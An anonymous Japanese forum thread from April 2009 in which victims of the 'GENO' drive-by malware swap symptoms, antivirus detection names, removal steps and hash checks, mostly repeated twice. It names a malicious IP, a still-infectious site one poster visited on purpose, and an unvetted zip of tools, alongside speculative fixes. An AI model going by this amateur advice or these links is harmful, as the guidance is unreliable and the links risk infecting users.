ファイルマネージャでC:\Windows内のウィルス本体ファイルを削除する。(その際フリーズするかも)
暫くしてそのまま再起動。今度はC:\RECYCLER内に先ほどのウィルス本体がリネームされて移動してるので
再度削除する。
これで、取りあえずGENOウィルス感染中に起きた異常は収まった。
(※WindowsUpdate不能、Regedit.exe使用不能、ブラウザの頻繁な異常終了、スタートアップ登録アプリの不起動等)
俺は比較的軽い症状だったので、あまり参考にならないかも試練が・・・
俺もGENOウィルスに感染したが、とりあえず元凶のウィルス本体は削除できたので報告。
まずa-squaredで検査。C:\Windows直下に変な名前のファイル(gluogug.gyd)が出来てる。
これがTROJAN-SPY.AGENT!IKと警告される。これは削除しても何遍でも復活する。
セーフモードやUbuntu起動CDから削除を試みたがそれでもダメ。
某スレで報告のあった、BART'sPEというソフトで起動CDを作成しCDから起動。
ファイルマネージャでC:\Windows内のウィルス本体ファイルを削除する。(その際フリーズするかも)
暫くしてそのまま再起動。今度はC:\RECYCLER内に先ほどのウィルス本体がリネームされて移動してるので
再度削除する。
これで、取りあえずGENOウィルス感染中に起きた異常は収まった。
(※WindowsUpdate不能、Regedit.exe使用不能、ブラウザの頻繁な異常終了、スタートアップ登録アプリの不起動等)
俺は比較的軽い症状だったので、あまり参考にならないかも試練が・・・
271 :名無しさん@お腹いっぱい。:2009/04/09(木) 02:14:51
いいか、みんな
(゚д゚ )
(| y |)
GENOと再度(cide)では単なる文字列だが
GENO ( ゚д゚) cide
\/| y |\/
2つ合わされば最強のウイルスサイトへと変化する
( ゚д゚) Genocide(ジェノサイド=大量虐殺、集団殺戮)
(\/\/
(゚д゚ )
(| y |)
GENOと再度(cide)では単なる文字列だが
GENO ( ゚д゚) cide
\/| y |\/
2つ合わされば最強のウイルスサイトへと変化する
( ゚д゚) Genocide(ジェノサイド=大量虐殺、集団殺戮)
(\/\/
272 :名無しさん@お腹いっぱい。:2009/04/09(木) 02:15:34
>>268
覚悟は決めたけど再インストールは避けたいな…
プニルを起動してるときはプニルのCPU使用率が100パーセント近かった。
プニルを終了したらMsMpEng.exeが動き出してCPU使用率50〜80パーセントくらい。
…今↑を書いたらMsMpEng.exeの動きが止まった。怖えー
変わりにSystem Idle Processの使用率が100パーセントになった。
なんだこれ?
覚悟は決めたけど再インストールは避けたいな…
プニルを起動してるときはプニルのCPU使用率が100パーセント近かった。
プニルを終了したらMsMpEng.exeが動き出してCPU使用率50〜80パーセントくらい。
…今↑を書いたらMsMpEng.exeの動きが止まった。怖えー
変わりにSystem Idle Processの使用率が100パーセントになった。
なんだこれ?
273 :名無しさん@お腹いっぱい。:2009/04/09(木) 02:16:50
これからビクビクしてずっと過ごすのは辛いよ
274 :名無しさん@お腹いっぱい。:2009/04/09(木) 02:17:30
>System Idle Processの使用率が100パーセント
これ正常
これ正常
275 :名無しさん@お腹いっぱい。:2009/04/09(木) 02:18:10
System Idle Processってそんなもんだよね
276 :名無しさん@お腹いっぱい。:2009/04/09(木) 02:18:59
277 :名無しさん@お腹いっぱい。:2009/04/09(木) 02:19:45
278 :名無しさん@お腹いっぱい。:2009/04/09(木) 02:19:53
>272
それはマイクロソフト謹製のウィルスみたいなスパイウェア対策ツール
そんな物既に捨てたよ
それはマイクロソフト謹製のウィルスみたいなスパイウェア対策ツール
そんな物既に捨てたよ
279 :名無しさん@お腹いっぱい。:2009/04/09(木) 02:26:59
サイト上のjsが読み込まれた時点でAdobe Readerが起動、
バッファオーバーフローの脆弱性を狙ってpdfファイル内に埋め込まれたスクリプトが実行される。
(Readerの設定でスクリプトの実行を切っていれば被害を受けない。)
ここまでは最新版のAdobe Readerでも同じっぽい。
Readerが最新版でなければこの段階でクリーンインストール推奨。
最新版の場合、被害があるのかないのかってのがよくわからない。
致命的なことにはならないと思うんだけど。
バッファオーバーフローの脆弱性を狙ってpdfファイル内に埋め込まれたスクリプトが実行される。
(Readerの設定でスクリプトの実行を切っていれば被害を受けない。)
ここまでは最新版のAdobe Readerでも同じっぽい。
Readerが最新版でなければこの段階でクリーンインストール推奨。
最新版の場合、被害があるのかないのかってのがよくわからない。
致命的なことにはならないと思うんだけど。
280 :名無しさん@お腹いっぱい。:2009/04/09(木) 02:27:42
281 :名無しさん@お腹いっぱい。:2009/04/09(木) 02:28:11
しかしID出ないセキュ板は使いにくいな
誰が誰やらわからんから安価誤爆も出てるし
情報の集約はID出る板の方がいいんじゃないか?
誰が誰やらわからんから安価誤爆も出てるし
情報の集約はID出る板の方がいいんじゃないか?
282 :名無しさん@お腹いっぱい。:2009/04/09(木) 02:28:16
283 : ◆W07s5cWHb. :2009/04/09(木) 02:31:30
284 :名無しさん@お腹いっぱい。:2009/04/09(木) 02:33:49
>>281
自作板に関連スレが立ってたはず
自作板に関連スレが立ってたはず
285 :名無しさん@お腹いっぱい。:2009/04/09(木) 02:33:53
>>277
>>270の元カキ子したの俺だけど、確かに>>162の方がスマートだよね。
しかし、書き忘れてたが俺の場合、感染中はウィルスに邪魔されてComboFixをダウンロードすることもできなかった。
で、ウィルス本体を削除したあと、今しがたComboFixを落として念のためチェックしてみたところ。
>>270の元カキ子したの俺だけど、確かに>>162の方がスマートだよね。
しかし、書き忘れてたが俺の場合、感染中はウィルスに邪魔されてComboFixをダウンロードすることもできなかった。
で、ウィルス本体を削除したあと、今しがたComboFixを落として念のためチェックしてみたところ。
286 :名無しさん@お腹いっぱい。:2009/04/09(木) 03:07:52
対策のまとめまだ〜
287 :名無しさん@お腹いっぱい。:2009/04/09(木) 03:13:02
ウイルスがどの程度の繁殖力があるのか判らんから怖いなぁ。
マルチブートでパーティションが10くらい有るけど感染したところだけ
バックアップイメージから復元してしてとりあえず様子見orz
ディスクのどこかに潜むたちの悪いタイプじゃなければ良いんだが。
マルチブートでパーティションが10くらい有るけど感染したところだけ
バックアップイメージから復元してしてとりあえず様子見orz
ディスクのどこかに潜むたちの悪いタイプじゃなければ良いんだが。
288 :名無しさん@お腹いっぱい。:2009/04/09(木) 04:04:28
AVソフトの対応した早さってわかる?
一番速かったところのAVソフト使いたいんだけど
一番速かったところのAVソフト使いたいんだけど
289 :名無しさん@お腹いっぱい。:2009/04/09(木) 04:09:13
290 : ◆W07s5cWHb. :2009/04/09(木) 04:12:13
>>288
私の記憶が正しければ対応一番乗りはマカフィーだったような。。。
私の記憶が正しければ対応一番乗りはマカフィーだったような。。。
291 :名無しさん@お腹いっぱい。:2009/04/09(木) 04:44:18
292 :名無しさん@お腹いっぱい。:2009/04/09(木) 05:05:52
通販サイト「GENO」の改ざん、広告掲載サイトにも影響
http://www.security-next.com/010250.html
通信販売サイト「GENO」が不正アクセスにより改ざんされた問題で、
同社広告を表示したメディアなどに影響が出ている。
アイティメディアでは、一部サイトにおいて4月1日より広告を掲載していたが、広告のリンク先が改ざんされ、
閲覧者にFlashやAdobe Readerにおける既知の脆弱性を攻撃するウイルスに感染するおそれがあったことから、
4月6日13時に広告掲載を停止したという。
最新版のウイルス対策ソフトなどを利用している場合、検知される可能性が高いが、
アイティメディアでは問題の期間に広告を閲覧したユーザーに対し、
ウイルス感染の有無を確認するよう呼びかけている。
アイティメディア
http://corp.itmedia.co.jp/
GENO
http://www.geno.co.jp/
http://www.security-next.com/010250.html
通信販売サイト「GENO」が不正アクセスにより改ざんされた問題で、
同社広告を表示したメディアなどに影響が出ている。
アイティメディアでは、一部サイトにおいて4月1日より広告を掲載していたが、広告のリンク先が改ざんされ、
閲覧者にFlashやAdobe Readerにおける既知の脆弱性を攻撃するウイルスに感染するおそれがあったことから、
4月6日13時に広告掲載を停止したという。
最新版のウイルス対策ソフトなどを利用している場合、検知される可能性が高いが、
アイティメディアでは問題の期間に広告を閲覧したユーザーに対し、
ウイルス感染の有無を確認するよう呼びかけている。
アイティメディア
http://corp.itmedia.co.jp/
GENO
http://www.geno.co.jp/
293 :名無しさん@お腹いっぱい。:2009/04/09(木) 05:07:00
自分はXP SP3で、4/7朝にGENOに行ったんだが現在まで感染の兆候が無い。
なんか気持ち悪いなあ、と思っていたんだが、VB2009のログを見て判った。
FWが動作してないのは昨日確認してたんだが、なんと、「フィッシング詐欺対策」で
94.247.2.195への接続を蹴りまくってくれてた。なんでも、「Web上の脅威」なんだと。
こうした、回避例もあった方が良いかと思って報告。
なんか気持ち悪いなあ、と思っていたんだが、VB2009のログを見て判った。
FWが動作してないのは昨日確認してたんだが、なんと、「フィッシング詐欺対策」で
94.247.2.195への接続を蹴りまくってくれてた。なんでも、「Web上の脅威」なんだと。
こうした、回避例もあった方が良いかと思って報告。
294 :名無しさん@お腹いっぱい。:2009/04/09(木) 05:07:42
広告主とのなんという差www
295 :名無しさん@お腹いっぱい。:2009/04/09(木) 05:20:54
jquery.js検出 4/5 0:00頃
●a-squared 4.0.0.101
2009.04.03 Trojan-Spy.Agent!IK
●Avast 4.8.1335.0
2009.04.03 Win32:Daonol-L
●eSafe 7.0.17.0
2009.04.02 Suspicious File
●GData 19
2009.04.03 Win32:KillAV-KS
●Ikarus T3.1.1.49.0
2009.04.03 Trojan-Spy.Agent
●Kaspersky 7.0.0.125
2009.04.03 Backdoor.Win32.Agent.afhg
●McAfee+Artemis 5573
2009.04.03 Generic!Artemis
●Prevx1 V2
2009.04.03 High Risk Cloaked Malware
●Sophos 4.40.0
2009.04.03 Mal/Generic-A
●TrendMicro 8.700.0.1004
2009.04.03 PAK_Generic.001
●a-squared 4.0.0.101
2009.04.03 Trojan-Spy.Agent!IK
●Avast 4.8.1335.0
2009.04.03 Win32:Daonol-L
●eSafe 7.0.17.0
2009.04.02 Suspicious File
●GData 19
2009.04.03 Win32:KillAV-KS
●Ikarus T3.1.1.49.0
2009.04.03 Trojan-Spy.Agent
●Kaspersky 7.0.0.125
2009.04.03 Backdoor.Win32.Agent.afhg
●McAfee+Artemis 5573
2009.04.03 Generic!Artemis
●Prevx1 V2
2009.04.03 High Risk Cloaked Malware
●Sophos 4.40.0
2009.04.03 Mal/Generic-A
●TrendMicro 8.700.0.1004
2009.04.03 PAK_Generic.001
296 :名無しさん@お腹いっぱい。:2009/04/09(木) 05:22:18
*.exe検出 4/7 0:00頃
●McAfee 5576
2009.04.06 Generic Dropper.ef(GmL.exe La.exe)
●McAfee+Artemis 5576
2009.04.06 Generic Dropper.ef(GmL.exe)
●eSafe 7.0.17.0
2009.04.06 Suspicious File(La.exe)
●Prevx1 V2
2009.04.06 High Risk Cloaked Malware(GmL.exe La.exe)
●Symantec 1.4.4.12
2009.04.06 Trojan.Dropper(GmL.exe La.exe)
●TrendMicro 8.700.0.1004
2009.04.06 PAK_Generic.001(GmL.exe La.exe)
●McAfee 5576
2009.04.06 Generic Dropper.ef(GmL.exe La.exe)
●McAfee+Artemis 5576
2009.04.06 Generic Dropper.ef(GmL.exe)
●eSafe 7.0.17.0
2009.04.06 Suspicious File(La.exe)
●Prevx1 V2
2009.04.06 High Risk Cloaked Malware(GmL.exe La.exe)
●Symantec 1.4.4.12
2009.04.06 Trojan.Dropper(GmL.exe La.exe)
●TrendMicro 8.700.0.1004
2009.04.06 PAK_Generic.001(GmL.exe La.exe)
297 :名無しさん@お腹いっぱい。:2009/04/09(木) 05:24:51
これもうリカバリするしかないですか?
298 :名無しさん@お腹いっぱい。:2009/04/09(木) 05:25:13
>>295-296
乙です。
乙です。
299 :名無しさん@お腹いっぱい。:2009/04/09(木) 05:26:54
※TrendMicroは圧縮ファイル指摘で検出ではない
300 :名無しさん@お腹いっぱい。:2009/04/09(木) 05:31:41
301 :名無しさん@お腹いっぱい。:2009/04/09(木) 05:45:52
>>297
サーバーのウィルス感染や個人情報の流失はございません。
旧プログラムを消去するためお客様側の対処といたしましてはwebブラウザのキャッシュのリセット頂く事をお願い致します。
http://www.geno.co.jp/webshop/okyakusama.html
http://www.geno.co.jp/recruit/job_01.jpg
サーバーのウィルス感染や個人情報の流失はございません。
旧プログラムを消去するためお客様側の対処といたしましてはwebブラウザのキャッシュのリセット頂く事をお願い致します。
http://www.geno.co.jp/webshop/okyakusama.html
http://www.geno.co.jp/recruit/job_01.jpg
302 :名無しさん@お腹いっぱい。:2009/04/09(木) 06:39:45
Bart'PEでウィルスを削除⇒正常なファイルに置き換え⇒常駐プログラムの削除
(レジストリのハイブを読み込んで修正)でどうにかナンねェか、これ?
(レジストリのハイブを読み込んで修正)でどうにかナンねェか、これ?
303 :名無しさん@お腹いっぱい。:2009/04/09(木) 06:44:42
感染中はSP+メーカーの統合が動かない(CMD.exeの動作不良に起因)ので、他パーティションのVista起動して
そっちでSP統合済みDVDを作ってからXP入れなおししたよ。
そっちでSP統合済みDVDを作ってからXP入れなおししたよ。
304 :名無しさん@お腹いっぱい。:2009/04/09(木) 06:47:36
305 :名無しさん@お腹いっぱい。:2009/04/09(木) 06:54:17
素性のわからんやつの作った板には行きにくい
管理者はhusianasanでもしてくれ
管理者はhusianasanでもしてくれ
306 :名無しさん@お腹いっぱい。:2009/04/09(木) 06:55:08
確かに迂闊に踏めないから困るw
307 :名無しさん@お腹いっぱい。:2009/04/09(木) 06:59:33
取り敢えず役立ちそうなものをまとめてUP。
http://www1.axfc.net/uploader/O/so/79648.zip
Size/40.4MB
MD5/813785CE59E7026893BFF5726193104B
内容/
・Adobe Reader ver.9.1(要更新)
・Adobe Flash Player ver.10.0.22.87 for FireFox(要更新/FireFoxのみ)
・HashTab Windows Shell Extension ver.2.3(ハッシュ確認)
・MD5 Checker ver.1.03b(ハッシュ確認)
・Combofix(マルウェア削除 USEフォルダ内に使用方法あり、使用は要注意)
・激動たる俺RegEdit改 ver.1.2.0.0(レジストリエディタ regeditが起動しないユーザ用)
あと、感染環境下だとcmdが動かないみたいだけどcommandは起動できる?
http://www1.axfc.net/uploader/O/so/79648.zip
Size/40.4MB
MD5/813785CE59E7026893BFF5726193104B
内容/
・Adobe Reader ver.9.1(要更新)
・Adobe Flash Player ver.10.0.22.87 for FireFox(要更新/FireFoxのみ)
・HashTab Windows Shell Extension ver.2.3(ハッシュ確認)
・MD5 Checker ver.1.03b(ハッシュ確認)
・Combofix(マルウェア削除 USEフォルダ内に使用方法あり、使用は要注意)
・激動たる俺RegEdit改 ver.1.2.0.0(レジストリエディタ regeditが起動しないユーザ用)
あと、感染環境下だとcmdが動かないみたいだけどcommandは起動できる?
308 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:02:31
309 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:03:55
>>308
危なくて踏めねーよ
危なくて踏めねーよ
310 :husianasan:2009/04/09(木) 07:08:56
GENOウイルス被害者の会は釣りじゃないです
311 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:10:35
312 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:12:12
ミスッタorz
GENOウイルス被害者の会は釣りではありません
安全なので安心してください。
被害者が多ければ集団訴訟なんかできないかと思っています。
かなり難しい戦いになると思いますが。
メールや電話でGENOに報告された方おられましたらご連絡ください。
GENOウイルス被害者の会は釣りではありません
安全なので安心してください。
被害者が多ければ集団訴訟なんかできないかと思っています。
かなり難しい戦いになると思いますが。
メールや電話でGENOに報告された方おられましたらご連絡ください。
313 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:13:37
なんか怪しいURLだなw Noscript対応FireFoxで見てみたけど、もうちょっと
スレの内容を反映させて「使える」コンテンツにしてくれよ。あれじゃどうしようもない。
スレの内容を反映させて「使える」コンテンツにしてくれよ。あれじゃどうしようもない。
314 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:13:46
/)
///)
/,.=゙''"/
/ i f ,.r='"-‐'つ____ キャッシュ削除すりゃぁいいんだよ!!
/ / _,.-‐'~/⌒ ⌒\
/ ,i ,二ニ⊃( ●). (●)\
/ ノ il゙フ::::::⌒(__人__)⌒::::: \
,イ「ト、 ,!,!| |r┬-| |
/ iトヾヽ_/ィ"\ `ー'´ /
///)
/,.=゙''"/
/ i f ,.r='"-‐'つ____ キャッシュ削除すりゃぁいいんだよ!!
/ / _,.-‐'~/⌒ ⌒\
/ ,i ,二ニ⊃( ●). (●)\
/ ノ il゙フ::::::⌒(__人__)⌒::::: \
,イ「ト、 ,!,!| |r┬-| |
/ iトヾヽ_/ィ"\ `ー'´ /
315 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:17:58
フシアナサンできないorz
>>313
自分も感染しているので、スレと照らし合わせて
とりあえず経験上の確定要素のみ書き込んでいます。
色々書きたいのですが、間違っていたら
迷惑を掛けてしまうので、、、
>>313
自分も感染しているので、スレと照らし合わせて
とりあえず経験上の確定要素のみ書き込んでいます。
色々書きたいのですが、間違っていたら
迷惑を掛けてしまうので、、、
316 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:19:30
感染してるPCから立てたんじゃないだろうな?w
317 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:20:28
XPSP3で全部最新だったが踏んだあとに
デフラグしてもCドライブが真っ赤な状態がおさまらなかった。
他に思い当たる原因がないんだよなぁ ウィルススキャンもデフラグも頻繁にしてるし
リカバリしたら直ったし
デフラグしてもCドライブが真っ赤な状態がおさまらなかった。
他に思い当たる原因がないんだよなぁ ウィルススキャンもデフラグも頻繁にしてるし
リカバリしたら直ったし
318 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:22:16
319 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:23:50
>>316
感染してるPCはブラウザが死に掛けで使い物にならないので
未感染のノートPC使っています。
掲示板はレンタルサーバーの物でメルアド一つで作成できるタイプですので
ウイルス汚染の心配はありません。
感染してるPCはブラウザが死に掛けで使い物にならないので
未感染のノートPC使っています。
掲示板はレンタルサーバーの物でメルアド一つで作成できるタイプですので
ウイルス汚染の心配はありません。
320 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:24:00
>>317
スタートボタン⇒ファイル名を指定して実行 でcmdとかregeditは正常に動くの?
スタートボタン⇒ファイル名を指定して実行 でcmdとかregeditは正常に動くの?
321 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:25:24
>>319
内容を充実させてくれ〜
内容を充実させてくれ〜
322 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:26:34
>>9
PCがおかしくなったんだけどどうやってなおせばいい?orz
PCがおかしくなったんだけどどうやってなおせばいい?orz
323 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:26:52
324 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:29:05
325 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:38:52
326 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:40:39
327 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:42:30
>>322
感染してから対策したって意味ないぞw
感染してから対策したって意味ないぞw
328 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:45:40
husianasan hじゃなくてfだぞ
329 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:49:04
こういうときマカはさびしいよな
ウィルスに縁がなす
祭りのみんながうらやましい
ウィルスに縁がなす
祭りのみんながうらやましい
330 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:52:18
>>329
GENOでWin機買えば今ならセットです。
GENOでWin機買えば今ならセットです。
331 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:55:29
>>326
unable to launch application. please restart your computer try again. error code: ー2147023174
って出てネットにもつながらんw
携帯から打ってる。
再インスコするわ
unable to launch application. please restart your computer try again. error code: ー2147023174
って出てネットにもつながらんw
携帯から打ってる。
再インスコするわ
332 :名無しさん@お腹いっぱい。:2009/04/09(木) 08:03:58
>>330
なんかすごくお得そうで欲しくなる不思議さw
なんかすごくお得そうで欲しくなる不思議さw
333 :名無しさん@お腹いっぱい。:2009/04/09(木) 08:07:50
334 :名無しさん@お腹いっぱい。:2009/04/09(木) 08:20:04
スタッフA
「Webサイトの改ざんによるウイルス感染など普通にパソコンを使用しているだけでも、
ウイルスに感染してしまうという事例が増えています」
スタッフB
「ウイルスの感染を未然に防ぐためにも、最新のセキュリティソフトを使用し、
ウイルス定義データベースを常に最新に保つことが、安全なPC使用の第一歩です」
スタッフC
「ただいま、通販ショップGENOでは、総合セキュリティソフト各種を好評取り扱い中!
PCパーツご購入の際にご一緒にいかがですか?」
http://www.geno.co.jp/recruit/job_01.jpg
「Webサイトの改ざんによるウイルス感染など普通にパソコンを使用しているだけでも、
ウイルスに感染してしまうという事例が増えています」
スタッフB
「ウイルスの感染を未然に防ぐためにも、最新のセキュリティソフトを使用し、
ウイルス定義データベースを常に最新に保つことが、安全なPC使用の第一歩です」
スタッフC
「ただいま、通販ショップGENOでは、総合セキュリティソフト各種を好評取り扱い中!
PCパーツご購入の際にご一緒にいかがですか?」
http://www.geno.co.jp/recruit/job_01.jpg
335 :名無しさん@お腹いっぱい。:2009/04/09(木) 08:26:56
最近PCが重い!
│
├ 1.ウィルスを駆除する
│
│ [まちがい]
│ 安上がりな方法ではありますが、対応していない場合もあるのが難点です。
│ それよりも別の手段を探してみませんか?
│ もっと確実な方法があるかも?
│ ↑
│ ココがポイント!
│
└ 2.GENOで新しいPCを買う
[せいかい]
web通販ショップ GENO
ttp://www.geno.co.jp/webshop/okyakusama.html
│
├ 1.ウィルスを駆除する
│
│ [まちがい]
│ 安上がりな方法ではありますが、対応していない場合もあるのが難点です。
│ それよりも別の手段を探してみませんか?
│ もっと確実な方法があるかも?
│ ↑
│ ココがポイント!
│
└ 2.GENOで新しいPCを買う
[せいかい]
web通販ショップ GENO
ttp://www.geno.co.jp/webshop/okyakusama.html
336 :名無しさん@お腹いっぱい。:2009/04/09(木) 08:34:13
概要>>1,51
la.exeがsqlsodbc.chmを書換>>60
sqlsodbc.chm?>>47-49
chm脆弱性>>52,65
sqlsodbc.chmの確認>>84,144,159,168,181
ComboFixで駆除例>>162
まとめ>>191,261
メモリ上のプロセスが書換られる>>71-72,79
感染経路?海外での感染例>>80,82
役立ちファイルまとめ>>307
結論>>314
la.exeがsqlsodbc.chmを書換>>60
sqlsodbc.chm?>>47-49
chm脆弱性>>52,65
sqlsodbc.chmの確認>>84,144,159,168,181
ComboFixで駆除例>>162
まとめ>>191,261
メモリ上のプロセスが書換られる>>71-72,79
感染経路?海外での感染例>>80,82
役立ちファイルまとめ>>307
結論>>314
337 :名無しさん@お腹いっぱい。:2009/04/09(木) 08:35:10
右クリックが使い物になりません。。。
ファイルやフォルダにカーソル当てて右クリックすると
確実にエクスプローラーが落ちます。
ノートン先生の起動もブロックされてるようだし
これは 死 亡 確 認 でよろしいでしょうかw
ファイルやフォルダにカーソル当てて右クリックすると
確実にエクスプローラーが落ちます。
ノートン先生の起動もブロックされてるようだし
これは 死 亡 確 認 でよろしいでしょうかw
338 :名無しさん@お腹いっぱい。:2009/04/09(木) 08:35:32
踏んでしまったようなのですが、
気になって最初にカスペルオンラインで調べたところ、
Trojan-Downloader.JS.Agent.dwfが検知されました。
ただ、インターネットの一時ファイルを削除したら検知されなくなりました。
AdobeReader/Flash共に最新版ですし、
sqlsodbc.chmのハッシュ値も>>84の通り。
挙動も問題なく再起動も可能です。
これって安心して良いのでしょうか?
最初にカスペルオンラインで検知されたのが気になるんですが…
気になって最初にカスペルオンラインで調べたところ、
Trojan-Downloader.JS.Agent.dwfが検知されました。
ただ、インターネットの一時ファイルを削除したら検知されなくなりました。
AdobeReader/Flash共に最新版ですし、
sqlsodbc.chmのハッシュ値も>>84の通り。
挙動も問題なく再起動も可能です。
これって安心して良いのでしょうか?
最初にカスペルオンラインで検知されたのが気になるんですが…
339 :名無しさん@お腹いっぱい。:2009/04/09(木) 08:37:53
安心したければ、クリーンインストールしかない
340 :名無しさん@お腹いっぱい。:2009/04/09(木) 08:37:54
まだやってたのか
341 :名無しさん@お腹いっぱい。:2009/04/09(木) 08:40:16
342 :名無しさん@お腹いっぱい。:2009/04/09(木) 09:27:37
ハッシュが正規のものと完全一致してれば間違いなく感染してないってことでFA?
343 :名無しさん@お腹いっぱい。:2009/04/09(木) 09:28:28
あくまで一つの確認法だとおもわれ
344 :名無しさん@お腹いっぱい。:2009/04/09(木) 09:40:00
質問。
閲覧して感染した場合、PC内のデータその物も感染してヤバいですかね?
ROMに焼いて他に移すとかもダメ?
最悪データを全部廃棄の形でクリーンインストするしかないのかな…?
閲覧して感染した場合、PC内のデータその物も感染してヤバいですかね?
ROMに焼いて他に移すとかもダメ?
最悪データを全部廃棄の形でクリーンインストするしかないのかな…?
345 :名無しさん@お腹いっぱい。:2009/04/09(木) 09:42:18
346 :名無しさん@お腹いっぱい。:2009/04/09(木) 09:46:05
>>336
La.exeの書き換えは違うぞ。
La.exeはGENOウイルスと独立したもの。
La.exe、GENOウイルスは同じウイルスだがsqlsodbc.chmを書き換えるのはTEMPに作成される
explore.exe、または○○○.exeだと思われ(多分La.exeもexplorer.exeだと思う)
La.exeの書き換えは違うぞ。
La.exeはGENOウイルスと独立したもの。
La.exe、GENOウイルスは同じウイルスだがsqlsodbc.chmを書き換えるのはTEMPに作成される
explore.exe、または○○○.exeだと思われ(多分La.exeもexplorer.exeだと思う)
347 :名無しさん@お腹いっぱい。:2009/04/09(木) 09:48:12
そもそもsqlsodbc.chmがwindows直下に見当たらない自分はアウト?
348 :名無しさん@お腹いっぱい。:2009/04/09(木) 09:49:01
>>347
system32直下では?
system32直下では?
349 :名無しさん@お腹いっぱい。:2009/04/09(木) 09:49:16
C:\WINDOWS\system32の下だよ
350 :名無しさん@お腹いっぱい。:2009/04/09(木) 09:50:10
サンクス>>348-349
ちょっと確認しみてる
ちょっと確認しみてる
351 :名無しさん@お腹いっぱい。:2009/04/09(木) 09:51:52
あった
f639afde02547603a3d3930ee4bf8c12
一応安心した
f639afde02547603a3d3930ee4bf8c12
一応安心した
352 :名無しさん@お腹いっぱい。:2009/04/09(木) 09:53:38
ちなみにAVGの有料版は対応してる
353 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:02:57
そんな手間掛けなくてもnrtstatコマンドで感染してるか簡単に調べられるだろ
354 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:04:07
>>353
それやっちゃだめ 地雷が発動するから
それやっちゃだめ 地雷が発動するから
355 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:05:20
>>353
netstatな
netstatな
356 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:06:01
ニュー速で同じことを書いてる人が
357 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:07:39
某掲示板でAMD64のCPUなら大丈夫と書かれてたのですが
本当ですか?
本当ですか?
358 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:08:56
359 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:16:40
>>344だが誰か分かる人いない?
360 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:19:17
>>357
おれX2 3800+で感染したよorz
おれX2 3800+で感染したよorz
361 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:19:45
362 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:19:59
なんか思っていたよりもタチの悪いウイルスっぽいな。
キャッシュ削除で解決とかアリエナス。
間違った対処法を掲載して感染拡大させてるGENOは本当に酷いな
キャッシュ削除で解決とかアリエナス。
間違った対処法を掲載して感染拡大させてるGENOは本当に酷いな
363 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:20:39
crestronjapan.comで感染を試みる(未だ有害)
Flashのバージョン10.0.22.87
Adobe Readerなしの環境→感染せず
Flashのバージョン10.0.22.87
Adobe Reader7環境→感染
Flashのバージョン10.0.22.87
Adobe Reader9→感染せず
つまり最新のAdobe Reader9なら感染しない
Flashのバージョン10.0.22.87
Adobe Readerなしの環境→感染せず
Flashのバージョン10.0.22.87
Adobe Reader7環境→感染
Flashのバージョン10.0.22.87
Adobe Reader9→感染せず
つまり最新のAdobe Reader9なら感染しない
364 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:21:23
>>360
ギャフン!
ギャフン!
365 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:21:31
366 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:22:44
>>359
感染したPCにUSBメモリを挿した瞬間USBメモリ自体に感染してしまう
可能性も無きにしも非ずなので、試して見ないとわかりませんが、
自分は他のPCまで感染させるわけにいかないので、試せません
感染したPCにUSBメモリを挿した瞬間USBメモリ自体に感染してしまう
可能性も無きにしも非ずなので、試して見ないとわかりませんが、
自分は他のPCまで感染させるわけにいかないので、試せません
367 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:24:54
うを!?色々と書き込みが(大汗
レスしてくれた人達、本当にありがとうね。感謝。
デジカメ画像なんだけどとりあえずROMに焼いて
数週間経ってからスキャンしてみるよ。
多分その頃には各ベンダーも対応してるかもしれないから。
レスしてくれた人達、本当にありがとうね。感謝。
デジカメ画像なんだけどとりあえずROMに焼いて
数週間経ってからスキャンしてみるよ。
多分その頃には各ベンダーも対応してるかもしれないから。
369 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:30:42
ν速やその他のアホがいい加減な事いったりしてるから
それにだまされる初心者が沢山いそうだな
それにだまされる初心者が沢山いそうだな
370 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:31:37
371 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:31:40
>>346
sorry
sorry
372 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:32:37
>>368
引き続きここも継続監視を
引き続きここも継続監視を
373 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:32:58
>>368
それが最善策だと思います
それが最善策だと思います
374 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:33:02
375 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:38:51
376 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:41:49
377 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:44:09
ほぼわかってきたね
・ウイルスの動作
・ウイルスの親玉(まだちょっと?)
・ウイルスの被害
・駆除方法
・今後の対策
・感染していないか確認する方法
